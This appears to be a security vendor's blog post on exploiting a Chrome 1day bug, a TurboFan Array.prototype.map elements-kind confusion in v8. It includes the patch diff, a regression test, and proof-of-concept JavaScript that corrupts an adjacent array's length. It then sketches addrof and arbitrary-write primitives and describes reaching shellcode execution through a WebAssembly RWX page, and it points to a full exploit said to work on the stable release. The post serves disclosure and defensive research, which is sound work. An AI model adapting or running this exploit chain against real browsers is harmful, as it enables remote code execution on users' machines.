A window of opportunity: exploiting a Chrome 1day vulnerability

This post explores the possibility of developing a working exploit for a vulnerability already patched in the v8 source tree before the fix makes it into a stable Chrome release.

Chrome Release Schedule

Chrome has a relatively tight release cycle, pushing a new stable version every 6 weeks, with stable refreshes in between if warranted by critical issues. As a result of its open-source development model, security fixes are immediately visible in the source tree, but they need time to be tested in the non-stable release channels of Chrome before they can be pushed out via the auto-update mechanism as part of a stable release to most of the user base.

In effect, there’s a window of opportunity for attackers ranging from a couple days to weeks in which the vulnerability details are practically public yet most of the users are vulnerable and cannot obtain a patch.

Open Source Patch Analysis

Looking through the git log of v8 can be an overwhelming experience. One change, however, caught my attention immediately. The fix has the following commit message:

[TurboFan] Array.prototype.map wrong ElementsKind for output array.

The associated Chromium issue tracker entry is restricted and likely to remain so for months. However, the commit has all the ingredients that might allow an attacker to produce an exploit quickly, which is the ultimate goal here: TurboFan is the optimizing JIT compiler of v8, which has become a hot target recently. Array vulnerabilities are always promising, and this one hints at a type confusion between element kinds, which can be relatively straightforward to exploit. The patch also includes a regression test that effectively triggers the vulnerability, which helps shorten exploit development time.

The only modified method is JSCallReducer::ReduceArrayMap in src/compiler/js-call-reducer.cc:

Reduction JSCallReducer::ReduceArrayMap(Node* node,
                                        const SharedFunctionInfoRef& shared) {
  // ...
  Node* original_length = effect = graph()->NewNode(
      simplified()->LoadField(AccessBuilder::ForJSArrayLength(kind)), receiver,
      effect, control);

+ // If the array length >= kMaxFastArrayLength, then CreateArray
+ // will create a dictionary. We should deopt in this case, and make sure
+ // not to attempt inlining again.
+ original_length = effect = graph()->NewNode(
+     simplified()->CheckBounds(p.feedback()), original_length,
+     jsgraph()->Constant(JSArray::kMaxFastArrayLength), effect, control);
+
  // Even though {JSCreateArray} is not marked as {kNoThrow}, we can elide the
  // exceptional projections because it cannot throw with the given parameters.
  Node* a = control = effect = graph()->NewNode(
      javascript()->CreateArray(1, MaybeHandle<AllocationSite>()),
      array_constructor, array_constructor, original_length, context,
      outer_frame_state, effect, control);

JSCallReducer runs during the InliningPhase of TurboFan; its ReduceArrayMap method attempts to replace calls to Array.prototype.map with inlined code. The comments are descriptive: the added lines insert a CheckBounds node to verify that the length of the receiver array is below JSArray::kMaxFastArrayLength (32 * 1024 * 1024 elements). This length is then passed to CreateArray, which allocates the output array.

The v8 engine has different optimizations for the storage of arrays that have specific characteristics. For example, PACKED_DOUBLE_ELEMENTS is the elements kind used for arrays that only have double elements and no holes. These are stored as a contiguous array in memory and allow for efficient code generation for operations like map. Confusion between the different element kinds is a common source of security vulnerabilities.
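
As a quick illustration (not part of the patch or the PoC), the elements kind of an array can be inspected in the d8 shell when it is started with the --allow-natives-syntax flag; the exact debug output varies between v8 versions:

// %DebugPrint shows, among other things, the elements kind of an object.
let packed_double = [1.1, 2.2, 3.3];   // PACKED_DOUBLE_ELEMENTS: contiguous doubles, no holes
let holey_smi     = [1, 2, , 4];       // HOLEY_SMI_ELEMENTS: small integers with a hole
let generic       = [1.1, "a", {}];    // PACKED_ELEMENTS: boxed, mixed values

%DebugPrint(packed_double);
%DebugPrint(holey_smi);
%DebugPrint(generic);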

So why is it a problem if the length is above kMaxFastArrayLength? Because CreateArray will return an array with a dictionary element kind for such lengths. Dictionaries are used for large and sparse arrays and are basically hash tables. However, by feeding it the right type feedback, TurboFan will try to generate optimized code for contiguous arrays. This is a common property of many JIT compiler vulnerabilities: the compiler makes an optimization based on type feedback but a corner case allows an attacker to break the assumption during runtime of the generated code.
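
The difference can be observed directly, again in d8 with --allow-natives-syntax. This is only an illustrative sketch of the behavior, not part of the exploit:

// A small requested length keeps a fast (holey) backing store...
let small = new Array(100);
%DebugPrint(small);   // elements kind: HOLEY_SMI_ELEMENTS

// ...while a length of kMaxFastArrayLength (32 * 1024 * 1024) or more ends up
// with dictionary-mode elements (lower thresholds may apply on some allocation paths).
let huge = new Array(32 * 1024 * 1024 + 500);
%DebugPrint(huge);    // elements kind: DICTIONARY_ELEMENTS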

Since the dictionary and contiguous element kinds have vastly different backing storage mechanisms, this allows for memory corruption. In effect, the output array will be a small (considering its size in memory, not its length property) dictionary that will be accessed by the optimized code as if it was a large (again, considering its size in memory) contiguous region.

Looking at the regression test included in the fix, the first half feeds the mapping function with type feedback for an array with contiguous storage; then, after the function has been optimized by TurboFan, the test invokes it with an array that is large enough for the output of map to end up with dictionary elements kind.

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
function mapping(a) {
  return a.map(v => v);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1,0);
a.push(2);
a.length += 500;
// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
mapping(a);

Exploitation

Since the map operation will write ~32 million elements out-of-bounds to the output array, the regression test essentially triggers a wild memcpy. To make exploitation possible, the copy loop of map needs to be stopped early. This can be done by providing a callback function that throws an exception after the desired number of iterations. Another issue is that map overwrites everything linearly, without gaps, whereas ideally we would like to overwrite only a single value at a specific offset, e.g. the length property of an adjacent array. Reading through the documentation of Array.prototype.map, the following can be seen:

map calls a provided callback function once for each element in an array, in order, and constructs a new array from the results. callback is invoked only for indexes of the array which have assigned values, including undefined. It is not called for missing elements of the array (that is, indexes that have never been set, which have been deleted or which have never been assigned a value).

So unset elements (holes) are skipped and map writes nothing to the output array for those indexes. The short standalone snippet below demonstrates both behaviors, and the PoC code that follows it uses them to overwrite the length of an array adjacent to the map output array.
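
This snippet is illustrative only and is not part of the exploit; it confirms that the callback is never invoked for holes and that throwing from the callback terminates the iteration early:

// map never calls the callback for holes and never writes those indexes.
let holey = [1, , 3];
let calls = 0;
let out = holey.map(v => { calls++; return v * 2; });
console.log(calls);      // 2: the hole at index 1 was skipped
console.log(1 in out);   // false: nothing was written at index 1

// Throwing from the callback stops the iteration immediately.
let written = 0;
try {
  [1, 2, 3, 4].map((v, idx) => {
    if (idx == 2) throw "stop";
    written++;
    return v;
  });
} catch (e) {}
console.log(written);    // 2: only indexes 0 and 1 were processed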

// This call ensures that TurboFan won't inline array constructors.
Array(2**30);

// We are aiming for the following object layout:
// [output of Array.map][packed float array]
// First the length of the packed float array is corrupted via the original
// vulnerability, then the corrupted array is used for out-of-bounds access.

// offset of the length field of the float array from the map output
const float_array_len_offset = 23;

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
var float_array;

function mapping(a) {
  function cb(elem, idx) {
    if (idx == 0) {
      float_array = [0.1, 0.2];
    }
    if (idx > float_array_len_offset) {
      // minimize the corruption for stability
      throw "stop";
    }
    return idx;
  }

  return a.map(cb);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1, float_array_len_offset, float_array_len_offset+1);
a.fill(1, float_array_len_offset+2);

a.push(2);
a.length += 500;

// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
cnt = 1;
try {
mapping(a);
} catch(e) {
console.log(float_array.length);
console.log(float_array[3]);
}

At this point, we have a float array that can be used for out-of-bounds reads and writes. The exploit aims for the following object layout on the heap to capitalize on this:

[output of Array.map][packed float array][typed array][obj]

The corrupted float array is used to modify the backing store pointer of the typed array, thus achieving arbitrary read/write. obj at the end is used to leak the address of arbitrary objects by setting them as inline properties on it, then reading their tagged pointers through the float array. From then on, the exploit follows the steps described in my previous post to achieve arbitrary code execution: creating an RWX page via WebAssembly, traversing the JSFunction object hierarchy to locate that page in memory, and placing the shellcode there.
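
The primitives built on top of that layout look roughly like the sketch below. The index constants, the obj.leak property name, and the helper names are hypothetical placeholders for illustration; the actual exploit derives the real offsets from the heap layout it sets up. float_array, typed_array and obj refer to the objects in the layout above.

// Hypothetical indexes into the corrupted float_array; the real values depend
// on the groomed heap layout.
const TYPED_ARRAY_BACKING_STORE_IDX = 10;  // overlaps the typed array's backing store pointer
const OBJ_INLINE_PROP_IDX = 20;            // overlaps obj's first inline property

// Helpers to reinterpret a double as a 64-bit integer and back.
let conv_f64 = new Float64Array(1);
let conv_u64 = new BigUint64Array(conv_f64.buffer);
const ftoi = f => { conv_f64[0] = f; return conv_u64[0]; };
const itof = i => { conv_u64[0] = i; return conv_f64[0]; };

// addrof: park an object in an inline property of obj, then read its tagged
// pointer out of bounds through the corrupted float array.
function addrof(o) {
  obj.leak = o;
  return ftoi(float_array[OBJ_INLINE_PROP_IDX]);
}

// Arbitrary write: redirect the typed array's backing store pointer to the
// target address, then write through the typed array as usual.
function write(addr, bytes) {
  float_array[TYPED_ARRAY_BACKING_STORE_IDX] = itof(addr);
  typed_array.set(bytes);
}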

The full exploit code, which works on the latest stable version (v73.0.3683.86 as of 3rd April 2019), can be found on our GitHub and can be seen in action below. It is quite reliable and could also be integrated with a Site Isolation-based brute-forcer, as discussed in our previous blog posts. Note that a sandbox escape would be needed for a complete chain.

Detection

The exploit does not rely on any uncommon features or cause unusual behavior in the renderer process, which makes it difficult to distinguish malicious code from benign code without generating false positives.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

The idea of developing exploits for 1day vulnerabilities before the fix becomes available isn’t new and the issue is definitely not unique to Chrome. Even though exploits developed for such vulnerabilities have a short lifespan, malicious actors may take advantage of them, as they avoid the risk of burning 0days. Keeping up-to-date on patches/updates from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch to know if it applies to an exploitable security vulnerability.

The timely analysis of these 1day vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.